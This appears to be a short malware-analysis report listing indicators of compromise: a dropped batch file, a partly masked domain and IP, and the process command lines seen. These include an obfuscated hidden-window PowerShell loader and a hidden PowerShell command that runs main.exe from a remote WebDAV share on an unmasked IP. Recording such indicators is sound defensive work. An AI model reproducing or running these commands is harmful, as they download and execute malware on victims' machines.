Technical Information
- %APPDATA%\main.bat
- 'ww##.#unapic.com':443
- '91.##7.183.9':8000
- http://91.###.183.9:8000/main.bat via 91.##7.183.9
- DNS ASK ww##.#unapic.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA ...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\main.bat" "
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe